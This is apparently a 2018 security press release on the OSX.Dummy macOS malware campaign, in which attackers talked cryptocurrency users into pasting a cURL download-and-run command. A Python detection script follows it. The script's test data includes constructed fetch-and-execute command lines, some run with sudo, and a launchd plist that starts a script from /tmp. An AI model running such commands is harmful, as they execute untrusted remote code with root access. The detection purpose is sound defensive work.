Delaware, USA – July 3, 2018 – At the end of June, researchers reported a campaign targeting macOS users. The adversaries used new malware dubbed OSX.Dummy, which bypasses Gatekeeper and lets them execute commands remotely on the infected system. Despite the rising number of macOS malware samples, only a few pose a serious threat, so the emergence of a sample that actually works attracts attention. OSX.Dummy is much less advanced than typical Windows malware and has an unusually large file size, and the campaign is aimed at cryptocurrency investors. The attackers pose as administrators in cryptocurrency-related Slack and Discord chats and convince users to paste a command into the terminal that uses the cURL utility to download and run OSX.Dummy. Gatekeeper only inspects files that carry the quarantine attribute set by browsers and similar applications; a binary fetched with cURL and launched from the terminal never gets that attribute, so it is never checked, and even a file of almost 34 megabytes runs without raising suspicion. OSX.Dummy then establishes persistence on the infected system and tries to connect to its command and control server; if the connection succeeds, the attackers can execute arbitrary code as root.
Even simple tools in the hands of experienced attackers can lead to data exfiltration or compromise of the organization’s network. You can use your SIEM and Netflow Security Monitor to detect data breach attempts and suspicious spikes in network traffic.
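As an added example (not code from the original release or from any of the products mentioned), the following Python script shows SIEM-style detection logic for the two behaviours described above: a cURL download-and-execute one-liner pasted into the terminal, and a launchd property list used for persistence, one common macOS persistence mechanism (the release does not say which one OSX.Dummy uses). The command lines, the example.invalid hostname and the plist are constructed test data, not indicators from the OSX.Dummy campaign; the directory list and the set of interpreters are assumptions to tune per environment.

```python
"""Heuristics for macOS download-and-execute chains and launchd persistence.

Added example; not the original page's code.  All sample data below is
constructed: example.invalid is a reserved test domain and the plist is
invented for the demonstration.
"""
import os
import plistlib
import re
import shlex

DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "osascript"}
# Assumption: a legitimately installed launch item should not run from these.
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")


def _grants_exec(mode):
    """True for chmod modes that add execute permission (+x, 777, 0755, ...)."""
    if "x" in mode:
        return True
    return bool(re.fullmatch(r"[0-7]{3,4}", mode)) and any(int(d) & 1 for d in mode)


def analyze_command(cmd):
    """Split a shell command line into its pipeline/sequence stages and flag a
    remote download that is followed by execution of the downloaded content.
    Returns a dict with 'suspicious', 'elevated' (sudo used) and 'reasons'."""
    stages = [s for s in re.split(r"\s*(?:&&|\|\||;|\|)\s*", cmd.strip()) if s]
    downloaded = made_exec = elevated = False
    reasons = []
    for stage in stages:
        try:
            tokens = shlex.split(stage)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = stage.split()
        if not tokens:
            continue
        if tokens[0] == "sudo":
            elevated = True
            tokens = tokens[1:] or [""]
        raw = tokens[0]
        name = os.path.basename(raw)
        if name in DOWNLOADERS and any(t.startswith(("http://", "https://")) for t in tokens):
            downloaded = True
            reasons.append("remote download: " + stage)
        elif downloaded and name == "chmod" and len(tokens) > 1 and _grants_exec(tokens[1]):
            made_exec = True
            reasons.append("payload made executable: " + stage)
        elif downloaded and (
            name in INTERPRETERS                    # curl ... | bash
            or raw.startswith("./")                 # ./script after download
            or (made_exec and raw.startswith("/"))  # /tmp/x after chmod +x
        ):
            reasons.append("downloaded content executed: " + stage)
    suspicious = downloaded and any(r.startswith("downloaded content executed") for r in reasons)
    return {"suspicious": suspicious, "elevated": elevated,
            "made_exec": made_exec, "reasons": reasons}


def check_launch_item(plist_bytes):
    """Parse a launchd plist (LaunchAgents/LaunchDaemons) and report whether
    it starts a program from a directory in SUSPICIOUS_DIRS."""
    item = plistlib.loads(plist_bytes)
    args = item.get("ProgramArguments") or ([item["Program"]] if "Program" in item else [])
    hits = [a for a in args if a.startswith(SUSPICIOUS_DIRS)]
    return {"label": item.get("Label"), "run_at_load": bool(item.get("RunAtLoad")),
            "suspicious_paths": hits, "suspicious": bool(hits)}


# Constructed sample command lines, e.g. from shell history or process logs.
SAMPLE_COMMANDS = [
    "ls -la ~/Downloads",
    "wget https://example.invalid/tool.tar.gz && tar xzf tool.tar.gz",
    "curl -fsSL https://example.invalid/setup.sh | bash",
    "cd /tmp && curl -s https://example.invalid/update > script && chmod 777 script && sudo ./script",
]

# Constructed launchd plist: starts a script out of /tmp at every boot.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/usr/bin/python</string><string>/tmp/updater.py</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

if __name__ == "__main__":
    for c in SAMPLE_COMMANDS:
        r = analyze_command(c)
        print("ALERT" if r["suspicious"] else "ok   ", "root" if r["elevated"] else "user", c)
    print(check_launch_item(SAMPLE_PLIST))
```

The command heuristic deliberately treats a bare `curl | bash` and the longer `curl > file && chmod +x && ./file` form the same way, since both leave no quarantine attribute for Gatekeeper to act on; the `elevated` flag tells the analyst whether the victim also granted root through `sudo`. Expect some false positives from build scripts that download and run installers, so route matches to triage rather than blocking outright.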